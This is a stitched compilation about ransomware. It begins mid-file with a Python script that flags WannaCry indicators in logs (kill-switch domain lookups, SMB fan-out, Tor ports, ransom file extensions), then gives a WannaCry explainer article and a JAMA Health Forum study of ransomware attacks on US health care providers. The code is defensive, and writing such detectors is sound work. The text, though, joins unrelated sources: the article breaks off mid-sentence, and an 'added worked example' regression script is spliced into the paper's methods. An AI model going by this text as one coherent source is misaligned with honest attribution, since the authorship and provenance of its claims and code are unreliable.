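# spreading) rather than ordinary use of a file server.
SMB_FANOUT_THRESHOLD = 5

# Constructed line formats (invented for this example), one record per line:
#   NET  <src_ip> <dst_ip> <dst_port>
#   DNS  <src_ip> <query_name>
#   FILE <host_ip> <path>
LINE_RE = re.compile(r"^(NET|DNS|FILE)\s+(\S+)\s+(\S+)(?:\s+(\S+))?$")


def triage(lines):
    """Return a list of (indicator, host, detail) tuples for matching records."""
    findings = []
    smb_targets = defaultdict(set)  # src host -> distinct SMB destinations
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # lines that do not fit the expected shapes are ignored
        kind, host, value, extra = m.groups()
        if kind == "NET" and extra is not None and extra.isdigit():
            port = int(extra)
            if port in SMB_PORTS:
                smb_targets[host].add(value)
            elif port in TOR_PORTS:
                findings.append(("tor-port-connection", host, f"{value}:{port}"))
        elif kind == "DNS":
            # Normalise case and a trailing dot so resolver log variants still match.
            if value.lower().rstrip(".") == KILL_SWITCH_DOMAIN:
                findings.append(("kill-switch-lookup", host, value))
        elif kind == "FILE":
            if value.lower().endswith(RANSOM_EXT):
                findings.append(("ransom-extension-write", host, value))
    # Fan-out can only be judged once the whole window has been read.
    for host, targets in smb_targets.items():
        if len(targets) >= SMB_FANOUT_THRESHOLD:
            findings.append(("smb-fanout", host,
                             f"{len(targets)} distinct hosts on 445/139"))
    return findings


def hosts_by_indicator_count(findings):
    """Rank hosts by how many distinct indicator types they triggered."""
    per_host = defaultdict(set)
    for indicator, host, _ in findings:
        per_host[host].add(indicator)
    return Counter({h: len(s) for h, s in per_host.items()})


# Constructed sample: 10.0.0.15 shows every indicator; 10.0.0.40 is benign.
SAMPLE_LOGS = [
    "DNS 10.0.0.15 iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com",
    "NET 10.0.0.15 10.0.0.21 445",
    "NET 10.0.0.15 10.0.0.22 445",
    "NET 10.0.0.15 10.0.0.23 139",
    "NET 10.0.0.15 10.0.0.24 445",
    "NET 10.0.0.15 10.0.0.25 445",
    "NET 10.0.0.15 198.51.100.7 9001",
    "FILE 10.0.0.15 C:\\Users\\alice\\Documents\\budget.xlsx.RANSOMEXT",
    "NET 10.0.0.40 10.0.0.5 445",
    "DNS 10.0.0.40 www.example.com",
    "garbage line that should be ignored",
]

if __name__ == "__main__":
    results = triage(SAMPLE_LOGS)
    for indicator, host, detail in results:
        print(f"{host:12} {indicator:24} {detail}")
    print("ranking:", hosts_by_indicator_count(results).most_common())
```

A single indicator on its own is weak evidence (a legitimate file server talks on 445 all day), which is why the ranking helper counts distinct indicator types per host: a machine that looks up the kill switch domain, fans out over SMB, and writes files with the ransom extension is the one to isolate first.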

WannaCry and Windows 10

As noted, Microsoft released a patch for the SMB vulnerability that WannaCry exploits two months before the attack began. While unpatched Windows 10 systems were vulnerable, the automatic update feature built into the OS meant that almost all Windows 10 systems were protected by May of 2017.

The Microsoft SMB patch was initially only available for currently supported versions of Windows, which notably excluded Windows XP. There are still millions of internet-connected Windows XP systems out there—including at Britain’s National Health Service, where many WannaCry attacks were reported—and Microsoft eventually made the SMB patch available for older versions of the OS as well. However, a later analysis found that the vast majority of WannaCry infections struck machines running Windows 7, an operating system still supported when WannaCry was at its peak.

Who created WannaCry?

The security firm Symantec believed that the code behind this malware might have a North Korean origin. They fingered the Lazarus Group as the culprits behind WannaCry, a hacking group that has been tied to North Korea. Beginning their run in 2009 with crude DDoS attacks on South Korean government computers, they’ve become increasingly sophisticated, hacking Sony and pulling off bank heists.

Symantec made this identification in a blog post in late May of 2017, just a few weeks after WannaCry began its rapid spread. In December of 2017, Tom Bossert, who at the time was the U.S. National Security Advisor, wrote an op-ed in the Wall Street Journal in which he said that the U.S. government agreed with this assessment.

How did WannaCry start?

WannaCry exploded across the internet on May 12, 2017, taking advantage of EternalBlue, but Symantec’s initial blog post on WannaCry’s origins also revealed some important and little-known information about how the malware got started even before that. WannaCry had in fact been circulating for months before it became impossible to avoid. This earlier version of the malware was dubbed Ransom.Wannacry, and Symantec noted “substantial commonalities in the tools, techniques and infrastructure used by the attackers” between this version of WannaCry and those used by the Lazarus Group, which is how Symantec pinned the attack on the North Koreans.

However, Ransom.Wannacry used stolen credentials to launch targeted attacks rather than EternalBlue, which meant that its spread was much less virulent and dramatic. It’s assumed that the Lazarus Group directed the shift to EternalBlue as a distribution mechanism, but

Does WannaCry still exist?

WannaCry still exists and still continues to spread and infect computers, which on the surface may come as a surprise. After all, while the EternalBlue exploit is a powerful one, it only works on Windows machines that haven’t received the appropriate patch, and that patch is available for free to all Windows users (even Windows XP users!) and has been for years. But IT pros know that far too many shops don’t properly keep up with patching, either due to lack of resources, lack of planning, or fear that updating an existing system will cause downtime or interfere with crucial running software.

Unfortunately, this is a recipe for chaos, and has resulted in wholly preventable WannaCry infections in the years since the malware first arrived on the scene. For instance, in March 2018, Boeing was hit with a suspected WannaCry attack. The company claimed it did little damage, however, affecting only a few production machines. Boeing was able to stop the attack and bring the affected systems back quickly, but a company of Boeing’s size and stature should’ve had adequate patches in place by that time.

As the years wore on, WannaCry remained a pernicious threat. A report in May of 2019—a full two years after the EternalBlue patch became available—found that 40% of healthcare organizations and 60% of manufacturers had experienced at least one WannaCry attack in the previous six months. This led Ben Seri, VP of research at Armis, to declare that WannaCry was “still unmanageable.”

That trend still continues today. The ongoing COVID-19 pandemic has made health care providers a particularly tempting target for ransomware gangs, and a surge of WannaCry attacks began in early 2020. Check Point Research found that the number of organizations affected by WannaCry grew by 53% in 2021. Some have asked how WannaCry was stopped; the answer is that, while patching slowed its spread, it hasn’t been stopped yet.

All EternalBlue-based malware exploits the same Windows vulnerability, so the fact that these attacks are ongoing suggests that plenty of unpatched Windows systems are still out there. It’s only a matter of time before an attacker finds them. Don’t let your infrastructure end up on their list.


Josh Fruhlinger

Josh Fruhlinger is a writer and editor who lives in Los Angeles.


Trends in Ransomware Attacks on US Hospitals, Clinics, and Other Health Care Delivery Organizations, 2016-2021

Hannah T. Neprash, Claire C. McGlave, Dori A. Cross, Beth A. Virnig, Michael A. Puskarich, Jared D. Huling, Alan Z. Rozenshtein, Sayeh S. Nikpay

Author affiliations:

1 University of Minnesota, School of Public Health, Minneapolis, Minnesota

2 University of Florida, College of Public Health and Health Professions, Gainesville, Florida

3 University of Minnesota, Medical School, Minneapolis, Minnesota

4 University of Minnesota, Law School, Minneapolis, Minnesota

Accepted for Publication: November 1, 2022.

Published: December 29, 2022. doi:10.1001/jamahealthforum.2022.4873

Open Access: This is an open access article distributed under the terms of the CC-BY License . © 2022 Neprash HT et al. JAMA Health Forum .

Author Contributions: Dr Neprash had full access to all of the data in the study and takes responsibility for the integrity of the data and the accuracy of the data analysis.

Concept and design: Neprash, McGlave, Huling, Rozenshtein, Nikpay.

Acquisition, analysis, or interpretation of data: Neprash, McGlave, Cross, Virnig, Puskarich.

Drafting of the manuscript: Neprash, Nikpay.

Critical revision of the manuscript for important intellectual content: All authors.

Statistical analysis: Neprash, McGlave, Huling.

Administrative, technical, or material support: McGlave, Rozenshtein, Nikpay.

Supervision: Neprash, Nikpay.

Other - methodological input: Cross.

Conflict of Interest Disclosures: None reported.

Additional Contributions: Ash Brizuela, BA, Benjamin Weideman, BA, Dana Varughese, BS, and Yazeed Abdelhay, BS (University of Minnesota), served as paid research assistants who assisted in the creation of the Tracking Healthcare Ransomware Events and Traits database under the supervision of Dr Neprash.

Associated Data

eTable 1. Data Sources and Methodology for Ransomware Attack Characteristics

eTable 2. Search Terms for Ransomware Attack Characteristics

eTable 3. Ransomware Attack Count, by Category of Information

eTable 4. Count of Attacks for which Each Source Provided Information

eTable 5. Change (Presented as Odds Ratios and Incident Rate Ratios) in Characteristics of Ransomware Attacks, from 2016 to 2021

Key Points

Question

How frequently do health care delivery organizations experience ransomware attacks, and how have the characteristics of ransomware attacks changed over time?

Findings

In this cohort study of 374 ransomware attacks, the annual number of ransomware attacks on health care delivery organizations more than doubled from 2016 to 2021, exposing the personal health information of nearly 42 million patients. During the study period, ransomware attacks exposed larger quantities of personal health information and grew more likely to affect large organizations with multiple facilities.

Meaning

The study results suggest that ransomware attacks on health care delivery organizations are increasing in frequency and sophistication; disruptions to care during ransomware attacks may threaten patient safety and outcomes.

Abstract

Importance

Anecdotal evidence suggests that health care delivery organizations face a growing threat from ransomware attacks that are designed to disrupt care delivery and may consequently threaten patient outcomes.

Objective

To quantify the frequency and characteristics of ransomware attacks on health care delivery organizations.

Design, Setting, and Participants

This cohort study used data from the Tracking Healthcare Ransomware Events and Traits database to examine the number and characteristics of ransomware attacks on health care delivery organizations from 2016 to 2021. Logistic and negative binomial regression quantified changes over time in the characteristics of ransomware attacks that affected health care delivery organizations.

Main Outcomes and Measures

Date of ransomware attack, public reporting of ransomware attacks, personal health information (PHI) exposure, status of encrypted/stolen data following the attack, type of health care delivery organization affected, and operational disruption during the ransomware attack.

Results

From January 2016 to December 2021, 374 ransomware attacks on US health care delivery organizations exposed the PHI of nearly 42 million patients. From 2016 to 2021, the annual number of ransomware attacks more than doubled from 43 to 91. Almost half (166 [44.4%]) of ransomware attacks disrupted the delivery of health care, with common disruptions including electronic system downtime (156 [41.7%]), cancellations of scheduled care (38 [10.2%]), and ambulance diversion (16 [4.3%]). From 2016 to 2021, ransomware attacks on health care delivery organizations increasingly affected large organizations with multiple facilities (annual marginal effect [ME], 0.08; 95% CI, 0.05-0.10; P < .001), exposed the PHI of more patients (ME, 66 385.8; 95% CI, 3400.5-129 371.2; P = .04), were less likely to be restored from data backups (ME, −0.04; 95% CI, −0.06 to −0.01; P = .002), were more likely to exceed mandatory reporting timelines (ME, 0.06; 95% CI, 0.03-0.08; P < .001), and increasingly were associated with delays or cancellations of scheduled care (ME, 0.02; 95% CI, 0-0.05; P = .02).

Conclusions and Relevance

This cohort study of ransomware attacks documented growth in their frequency and sophistication. Ransomware attacks disrupt care delivery and jeopardize information integrity. Current monitoring/reporting efforts provide limited information and could be expanded to potentially yield a more complete view of how this growing form of cybercrime affects the delivery of health care.

This cohort study examines the frequency and characteristics of ransomware attacks on health care delivery organizations.

Introduction

As health care delivery organizations have increased their reliance on health information technology, they have also increased their exposure to new cybersecurity risks, such as ransomware attacks. Ransomware is a type of malicious software that prevents users from accessing their electronic systems and demands a ransom to restore access.[1,2] Ransomware attacks are one cause of health care data breaches, which are becoming more common,[3,4,5] and are increasingly attributed to external causes (ie, hacking) rather than internal negligence or malfeasance (ie, misplaced laptops or inappropriately accessed data).[6] Unlike other data breaches, which often seek to steal data, ransomware attacks are purposefully designed to disrupt business operations, thereby motivating the attacked organization to make the demanded payment.

Although ransomware attacks have existed for years, the US Federal Bureau of Investigation (FBI) and other government entities warn that widespread use of ransomware attacks against health care delivery organizations coincides with the COVID-19 pandemic.[7,8,9] While some prominent ransomware attacks on health care delivery organizations have received considerable media attention,[10,11,12] to our knowledge, there is presently no systematic documentation of the extent and effect of ransomware attacks. News coverage of individual attacks suggests that ransomware attacks are substantially disruptive to care delivery, with reports of computers and electronic health records being disabled or encrypted,[13,14,15,16,17] clinicians forced to document care using pen and paper,[13,17] appointments and surgeries delayed or canceled,[11,14,16,18,19,20] emergency departments forced to divert ambulances,[11,14,15,17,20] and practice infrastructure so damaged that some practices have opted to close rather than try to restore systems.[21] Such instances of operational disruptions to the delivery of health care have been followed by some positing that ransomware attacks on health care delivery organizations may impose a human cost in addition to a financial one by jeopardizing patient safety and outcomes.[22,23] In this study, we used a database of ransomware attacks on health care delivery organizations to quantify and describe this growing phenomenon.

Methods

To conduct this study, we created a data source called the Tracking Healthcare Ransomware Events and Traits (THREAT) database and reported findings from the database. The THREAT database combines proprietary data provided by HackNotice (a cybersecurity threat intelligence company that helps businesses identify and respond to attacks) with data from the US Department of Health and Human Services Office of Civil Rights (HHS OCR) Data Breach Portal. The latter contains publicly available information that is collected when Health Insurance Portability and Accountability Act–covered entities report breaches of protected health information (PHI), as mandated by the Health Information Technology for Economic and Clinical Health Act of 2009. This study followed the Strengthening the Reporting of Observational Studies in Epidemiology (STROBE) reporting guidelines. This study was determined to be exempt from review and informed consent by the University of Minnesota institutional review board (common rule, category 5).

Identifying Ransomware Attacks on Health Care Delivery Organizations

The THREAT database began with every corporate cybersecurity breach within the HackNotice system. HackNotice populated this database by crawling search engines (ie, systematically querying certain terms) and web-scraping sources, such as publicly reported databases (ie, the HHS OCR Breach Portal and other state-based reporting), search engines, news outlets, trade publications, and forums on the dark web (ie, the part of the internet requiring the use of specialized encrypted browsing technology) on which hackers advertise stolen data for sale and describe the success of their exploits. Data fields recorded in this system included organization name, date of breach, type of breach (eg, ransomware, website defacement), a narrative description of the breach, and source documentation (eg, news, official reporting, dark web).

From the list of HackNotice cybersecurity breaches, we identified breaches that occurred between 2016 and 2021 for which the affected organization was a health care delivery organization operating in the US. This involved web searches for each affected company’s name and/or domain. Our definition of “health care delivery organization” was intentionally expansive, including hospitals, clinics, diagnostic laboratories, dental offices, substance use treatment centers, pharmacies, emergency medical services, and post–acute care facilities.

To determine whether each data breach involved a ransomware attack, we searched supplemental sources, including press releases issued by the attacked organization, public disclosures (ie, posted copies of form letters sent to patients whose PHI was exposed during the attack), local news reports, and health care trade press coverage. Data breaches were deemed ransomware attacks if supplemental sources included mention of “ransomware” or other keywords indicating a ransomware attack (eAppendix in the Supplement).

Publicly Reported Exposure of PHI

To quantify the number of individuals whose PHI was exposed during a ransomware attack, we relied on publicly reported information from the HHS OCR Data Breach portal.[4] We matched attacks in the THREAT database to the HHS OCR database manually using the covered entity’s name, state, and date of breach reporting (eAppendix in the Supplement). Organizations are statutorily required to notify HHS of a data breach and the number of individuals affected within 60 calendar days of breach discovery.[24] This information is made publicly available on the HHS website when the reported breach affects the PHI of 500 or more individuals. We additionally quantified whether a ransomware attack remained unreported to HHS OCR and the number of days that elapsed from the attack date to the reporting date.

Categorizing Health Care Delivery Organization Type and Attack Breadth

Having identified the ransomware attacks affecting health care delivery organizations in the HackNotice data, we searched the previously mentioned supplemental sources and added additional details to the THREAT database for every attack, including attack breadth and health care delivery organization type. Attack breadth was defined as whether the ransomware attack affected a single or multiple health care facilities. We also relied on supplemental data sources and the attacked organization’s web page to identify health care settings affected, categorizing delivery organizations as hospital, ambulatory surgery center, clinic, dental, mental/behavioral health, post–acute care, and other (eg, emergency medical services clinicians, plastic surgery centers, and infusion centers). eTable 1 in the Supplement provides additional detail on how we categorized health care delivery organization type and attack breadth.

Operational Disruptions

We collected reports on the type and duration of operational disruptions that occurred during ransomware attacks on health care delivery organizations. Common operational disruptions included ambulance diversion, canceled appointments/surgeries, and electronic system downtime. When available, we cataloged the duration of any operational interruption, as measured in days. Since supplemental sources frequently referenced a date at which operations were fully restored, we calculated the operational disruption duration as the number of days that elapsed from the date of the ransomware attack (ie, typically the date of the ransomware attack discovery; ransomware actors frequently have access for weeks or months before using malware that hinders operations) to the date of restoration. eTables 1 to 4 in the Supplement provide additional details on how we quantified operational disruptions and sources used.

Statistical Analysis

We calculated the annual frequency of ransomware attacks and descriptive statistics for characteristics of those attacks, including details of public reporting of PHI exposure, status of encrypted/stolen data, health care delivery organization type(s) affected, and operational disruptions. To quantify changes over time in binary outcome variables, we used logistic regression models with the year of the ransomware attack as a continuous variable. To obtain average annual marginal effects, we used the margins command in Stata, version 16.1 (StataCorp). For 2 count-based outcome variables (ie, count of individuals whose PHI was exposed and count of days during which care delivery was disrupted by the ransomware attack), we used negative binomial regression models with the year of the attack as a continuous variable. All regression analyses used Huber-White robust standard errors to assess statistical significance, which was defined as P < .05. Analyses were conducted from May 2022 to October 2022.
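The two computations the methods sections describe, as an added worked example that is not the authors' Stata code: the 60-day HHS OCR reporting-window classification from the "Publicly Reported Exposure of PHI" section, and the logistic regression of a binary attack characteristic on attack year with the "average annual marginal effect" from the statistical analysis. The regression is fitted by Newton-Raphson in plain Python, and the marginal effect is the sample mean of dP/dyear, which is what a marginal-effects command computes for a logit model. The sample is constructed from only the paper's 2016 and 2021 counts for late reporting (17 of 43 and 53 of 91), so its result is not the paper's six-year estimate of 0.06; the constants and function names are this example's own.

```python
import math
from datetime import date

# Reporting rules as described in the paper (HHS OCR breach reporting).
REPORTING_WINDOW_DAYS = 60   # statutory window from breach discovery to report
HHS_PUBLIC_THRESHOLD = 500   # breaches affecting 500 or more individuals are posted


def report_status(attack_date, report_date):
    """Classify a report's timeliness the way the paper does:
    'late' is outside the 60-day window, 'very_late' is more than twice the limit."""
    if report_date is None:
        return "unreported"
    elapsed = (report_date - attack_date).days
    if elapsed <= REPORTING_WINDOW_DAYS:
        return "on_time"
    if elapsed > 2 * REPORTING_WINDOW_DAYS:
        return "very_late"
    return "late"


def fit_logistic(x, y, tol=1e-10, max_iter=100):
    """Maximum-likelihood fit of P(y=1) = 1/(1+exp(-(a + b*x))) by Newton-Raphson.
    x is a continuous predictor (attack year); returns (a, b)."""
    a = b = 0.0
    for _ in range(max_iter):
        g_a = g_b = h_aa = h_ab = h_bb = 0.0
        for xi, yi in zip(x, y):
            p = 1.0 / (1.0 + math.exp(-(a + b * xi)))
            r = yi - p            # score contribution
            w = p * (1.0 - p)     # Fisher-information weight
            g_a += r
            g_b += r * xi
            h_aa += w
            h_ab += w * xi
            h_bb += w * xi * xi
        det = h_aa * h_bb - h_ab * h_ab
        da = (h_bb * g_a - h_ab * g_b) / det   # inverse-information times score
        db = (h_aa * g_b - h_ab * g_a) / det
        a += da
        b += db
        if abs(da) < tol and abs(db) < tol:
            break
    return a, b


def average_marginal_effect(x, a, b):
    """Average of dP/dx = b*p*(1-p) over the sample: the 'annual marginal effect'
    reported in the paper (a probability change per year, not a log-odds)."""
    total = 0.0
    for xi in x:
        p = 1.0 / (1.0 + math.exp(-(a + b * xi)))
        total += b * p * (1.0 - p)
    return total / len(x)


def endpoint_sample():
    """Constructed sample from the paper's 2016 and 2021 counts for
    'attack reported late to HHS OCR' (17 of 43, and 53 of 91).
    x is year minus 2016; shifting x changes a but not b or the marginal effect."""
    x, y = [], []
    for offset, n_attacks, n_late in ((0, 43, 17), (5, 91, 53)):
        x += [offset] * n_attacks
        y += [1] * n_late + [0] * (n_attacks - n_late)
    return x, y


def late_reporting_trend():
    """Fit the constructed sample; returns (log-odds change per year, annual ME)."""
    x, y = endpoint_sample()
    a, b = fit_logistic(x, y)
    return b, average_marginal_effect(x, a, b)


if __name__ == "__main__":
    b, ame = late_reporting_trend()
    print(f"log-odds change per year: {b:.4f}; annual marginal effect: {ame:.4f}")
    print(report_status(date(2020, 1, 1), date(2020, 6, 1)))
```

With only two distinct years in the sample, the fitted model reproduces the two observed late-reporting rates exactly, so the slope equals the difference of their log-odds divided by five years, and the marginal effect comes out near 0.037 per year; the paper's 0.06 uses all six years of data and robust standard errors, which this example does not compute.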

Results

During the study period (2016-2021), we documented 374 ransomware attacks on health care delivery organizations that exposed the PHI of 41 987 751 individuals (Figure 1). From 2016 to 2021, the annual number of ransomware attacks more than doubled, from 43 to 91. Personal health information exposure increased more than 11-fold, from approximately 1.3 million in 2016 to more than 16.5 million in 2021. A total of 84 ransomware attacks (22.5%) lacked information on PHI exposure, as they did not appear in the HHS OCR database (Table 1). Of the 290 ransomware attacks that were reported to HHS, most (203 [54.3% of all attacks]) were reported outside of the legislated reporting window of 60 days following the attack.

Figure 1. [image: jamahealthforum-e224873-g001.jpg] PHI indicates personal health information.

Table 1. Characteristics of ransomware attacks on health care delivery organizations (n = 374 attacks)

Characteristic                                          No. of attacks   Share of attacks, %
Public reporting
  Individuals whose PHI was exposed, mean               143 794          NA
  Attack reported to HHS OCR                            290              77.5
  Attack reported late to HHS OCR                       203              54.3
Status of encrypted/stolen data
  Data restored from backup                             77               20.6
  Some/all stolen PHI data made public                  59               15.8
Characteristics of the affected health care delivery organization
  Attack affected multiple facilities                   198              52.9
  Type of health care delivery organization affected
    Clinic                                              216              57.8
    Hospital                                            82               21.9
    Ambulatory surgical center                          56               15.0
    Mental/behavioral health                            51               13.6
    Dental                                              46               12.3
    Post acute care                                     12               3.2
    Other                                               80               21.4
Operational disruptions
  Disrupted care delivery                               166              44.4
  Disruption duration, mean, d                          15.8             NA
  Known disruption with unknown duration                67               17.9
  <1 wk                                                 39               10.4
  1-2 wk                                                28               7.5
  2-4 wk                                                16               4.3
  >4 wk                                                 16               4.3
  Type of disruption
    Ambulance diversion                                 16               4.3
    Delays/cancellations in scheduled care              38               10.2
    Electronic system (including EHR) downtime          156              41.7

Abbreviations: EHR, electronic health record; HHS OCR, Department of Health and Human Services Office of Civil Rights; NA, not applicable; PHI, personal health information.

Across all 374 attacks, approximately 1 in 5 (20.6%) health care organizations were reportedly able to restore data from backups (Table 1). For 59 ransomware attacks (15.8%), there was evidence that ransomware actors had made some or all of the stolen PHI public, typically by posting it on dark web forums where stolen data are advertised for sale by including a subset of records.

Clinics (of all specialties) were the most common health care delivery organization type to experience a ransomware attack (Table 1), followed by hospitals, other delivery organization types, ambulatory surgical centers, mental/behavioral health organizations, dental practices, and post–acute care organizations. More than half (198 [52.9%]) of all ransomware attacks affected multiple facilities within the attacked organization.

While all ransomware attacks are presumed to have some organizational effect in terms of activating system safeguards and leadership response, we documented evidence of care delivery disruptions during 166 ransomware attacks (44.4%) (Table 1). A total of 32 attacks (8.6%) were associated with a disruption exceeding 2 weeks. Types of care disruptions included electronic system downtime (156 [41.7%]), delays or cancellations of scheduled care (38 [10.2%]), and ambulance diversion (16 [4.3%]). Ransomware attack-induced operational disruptions varied by health care delivery organization type, with hospitals most likely to experience a disruption during a ransomware attack (Figure 2).

Figure 2. [image: jamahealthforum-e224873-g002.jpg] Ransomware attacks affecting multiple health care delivery organization types simultaneously appear in all relevant columns.

The characteristics of ransomware attacks on health care delivery organizations changed during the study period (Table 2; eTable 5 in the Supplement). With each year, ransomware attacks exposed the PHI of more patients (annual marginal effect [ME], 66 385.8; 95% CI, 3400.5-129 371.2; P = .04), a trend that was not limited to any single health care delivery organization type (Figure 3A). Over time, ransomware attacks were more likely to be reported late to the HHS OCR (ME, 0.06; 95% CI, 0.03-0.08; P < .001), and the number of attacks reported very late (ie, more than twice the statutory limit of 60 days from the attack) increased substantially in 2020 and 2021 (Figure 3B).

Table 2. Change in characteristics of ransomware attacks on health care delivery organizations, 2016 vs 2021

                                                    Ransomware attacks, No. (%)     Annual marginal effect
Characteristic                                      2016          2021              (95% CI)                          P value
Public reporting
  Individuals whose PHI was exposed, mean           37 690        229 687           66 385.8 (3400.5 to 129 371.2)    .04
  Attack reported to HHS OCR                        35 (81.4)     72 (79.1)         −0.02 (−0.05 to 0)                .08
  Attack reported late to HHS OCR                   17 (39.5)     53 (58.2)         0.06 (0.03 to 0.08)               <.001
Status of encrypted/stolen data
  Data restored from backup                         15 (34.9)     13 (14.4)         −0.04 (−0.06 to −0.01)            .002
  Some/all stolen PHI made public                   6 (14.0)      20 (22.2)         0.03 (0 to 0.06)                  .02
Characteristics of the affected health care delivery organization
  Attack affected multiple facilities               18 (41.9)     70 (76.9)         0.08 (0.05 to 0.10)               <.001
  Type of health care delivery organization affected
    Clinic                                          26 (60.5)     51 (56.0)         −0.02 (−0.05 to 0.01)             .13
    Hospital                                        13 (30.2)     23 (25.3)         0.02 (0 to 0.05)                  .12
    Ambulatory surgical center                      8 (18.6)      15 (16.5)         −0.00 (−0.02 to 0.02)             .89
    Mental/behavioral health                        3 (7.0)       18 (19.8)         0.04 (0.01 to 0.06)               .001
    Dental                                          2 (4.7)       12 (13.2)         0.01 (−0.01 to 0.03)              .23
    Post acute care                                 1 (2.3)       4 (4.4)           0.01 (−0.01 to 0.02)              .27
    Other                                           8 (18.6)      22 (24.2)         0.02 (−0.01 to 0.05)              .11
Operational disruptions
  Disrupted care delivery                           20 (46.5)     47 (51.7)         0.02 (−0.01 to 0.05)              .20
  Disruption duration, mean, d                      12.8 d        19.2 d            1.78 (−1.36 to 4.91)              .27
  Type of disruption
    Ambulance diversion                             1 (2.3)       7 (7.8)           0.01 (−0.00 to 0.03)              .09
    Delays/cancellations in scheduled care          2 (4.7)       14 (15.6)         0.02 (0 to 0.05)                  .02
    Electronic system (including EHR) downtime      20 (46.5)     44 (48.9)         0.01 (−0.02 to 0.04)              .40

Abbreviations: EHR, electronic health record; HHS OCR, Department of Health and Human Services Office of Civil Rights; ME, marginal effect; PHI, personal health information.

Figure 3. [image: jamahealthforum-e224873-g003.jpg] Each dot represents a ransomware attack on a health care delivery organization. The 84 health care delivery organizations that experienced a ransomware attack but did not submit information to the US Department of Health and Human Services were excluded.

From 2016 to 2021, the likelihood of health care organizations restoring ransomware-encrypted or stolen data from backups decreased (ME, −0.04; 95% CI, −0.06 to −0.01; P = .002), and more attacks were associated with some or all of the stolen PHI becoming public (ME, 0.03; 95% CI, 0-0.06; P = .02; Table 2; eTable 1 in the Supplement). During the study period, the probability that a ransomware attack affected multiple facilities simultaneously (ie, a larger organization) increased by eight percentage points annually (ME, 0.08; 95% CI, 0.05-0.10; P < .001). Mental/behavioral health care delivery organizations (ME, 0.04; 95% CI, 0.01-0.06; P = .001) were increasingly likely to experience ransomware attacks. While there was no statistically significant increase over time in operational disruptions overall, there was an increase in the likelihood that an attack was associated with delays or cancellations to scheduled care (ME, 0.02; 95% CI, 0.00-0.05; P = .02) and an increase (statistically significant only at P < .10) in the share of attacks that involved ambulance diversions (ME, 0.01; 95% CI, −0.0 to 0.03; P = .09).

Discussion

In this cohort study conducted with data from 2016 to 2021, we documented 374 ransomware attacks on health care delivery organizations that affected the PHI of nearly 42 million patients. The growing number of attacks affecting large entities (those with multiple facilities) and the associated growth in PHI exposed (along with the diminishing likelihood that an organization could restore data from backups) suggest that ransomware attacks on health care delivery organizations have increased in sophistication as well as in frequency. To our knowledge, these findings represent the only census of ransomware attacks on health care delivery organizations. However, the study’s estimates of magnitude align with findings in the gray literature, and the trend over time is consistent with reports that ransomware actors increasingly targeted health care delivery organizations during the COVID-19 pandemic.[7,25,26]

Despite careful research, many of the statistics reported in this article are likely underestimates due to underreporting. For example, 1 in 5 ransomware attacks were not present in the HHS OCR database. This absence may be due to low PHI exposure (ie, attacks affecting fewer than 500 individuals need not appear in the HHS OCR public database) or, alternatively, because of confusion about whether ransomware attacks must be reported through official channels when they involve encryption, but not actual removal, of data from computer systems. Guidance from HHS states that when a ransomware attack occurs, Health Insurance Portability and Accountability Act–covered entities and their business associates need not report it if they can demonstrate a low probability that PHI has been exposed.[1] Additionally, current reporting requirements lack either an enforcement mechanism or a penalty for noncompliance. Even when an entity reports an attack, there is no sanction for doing so outside of the legislated 60-day window, which may explain the high proportion (53.5%) of ransomware attacks with delayed reporting. Rather than health care organizations self-correcting as ransomware attacks become more common, we found an increase over time in the share of attacks that were reported late. Missing attacks and delayed reporting suggest opportunities for legislators who wish to strengthen data collection around cyberattacks, particularly ransomware, so as to shape an informed and well-targeted policy response.

Other information that is currently not tracked could potentially be incorporated into the existing reporting system. For example, policy makers could require the reporting of operational disruptions (eg, whether the health care delivery organization activated electronic health record downtime protocols and/or diverted ambulances) that occurred during a cyberattack. Administrative records, such as Medicare claims data, might also be used for similar purposes if the operational disruptions during ransomware attacks leave an identifiable signature. This approach might enable data collection without imposing additional reporting requirements on health care delivery organizations during an already challenging time. However, further research is needed to establish whether ransomware attacks create identifiable patterns in administrative data.

As is, this study’s findings regarding operational disruptions required individual research into each attack. Even with this constraint, we documented disruptions to care delivery during nearly half of all ransomware attacks, but the scope of the problem is likely larger. The most frequent disruption was to electronic systems, which frequently forced a switch to paper charting. Other documented disruptions included ambulance diversion and canceled appointments. These operational disruptions may harm patients, especially those experiencing emergencies and for whom timely treatment is crucial. 9 Further study is needed to quantify an empirical association between ransomware attacks and patient outcomes.

Additional legislative activity concerns the ransom itself, with proposals to mandate disclosure (of ransom demands, whether a payment was made, and for what amount) and potentially even banning the payment of ransoms.27,28 The FBI strongly recommends that businesses not acquiesce to ransom demands in the event of a ransomware attack, since complying with ransom demands incentivizes ransomware actors to continue targeting health care organizations. Going a step further, in 1 well-documented ransomware attack, law enforcement deliberately withheld the decryption key for nearly 3 weeks while planning an operation to disrupt the ransomware actors involved.29 To properly weigh law enforcement’s long-term deterrence goals against short-term patient safety goals, it is crucial to understand the association of ransomware attacks with patient safety and whether paying the ransom shortens the operational disruption.22 While it is intuitive to think that paying the ransom shortens the duration of any operational disruption, this is not necessarily the case; there are well-documented examples of follow-up ransom demands and nonfunctional decryption keys provided after ransom payments have been made.30 Additional ransom payment disclosure requirements would enable a better understanding of the potential tradeoff between financial cost and operational disruption duration.

Of equal if not more importance is identifying actions that health care delivery organizations can take to defend themselves effectively against ransomware attacks. Research suggests that health care delivery organizations are very susceptible to phishing emails that deceive insiders into giving access to hackers, 31 and such emails are a common entry point for ransomware attacks. Existing cybersecurity recommendations require substantial time and money that many, but especially the most vulnerable rural and safety net health care delivery organizations, may not realistically have. 1 , 32 Current estimates suggest that cybersecurity activities represent less than 10% of existing health system information technology budgets. 33 To motivate increased investment, rigorous research is needed to identify actions that successfully thwart ransomware and other cybersecurity attacks on health care delivery organizations.

Limitations

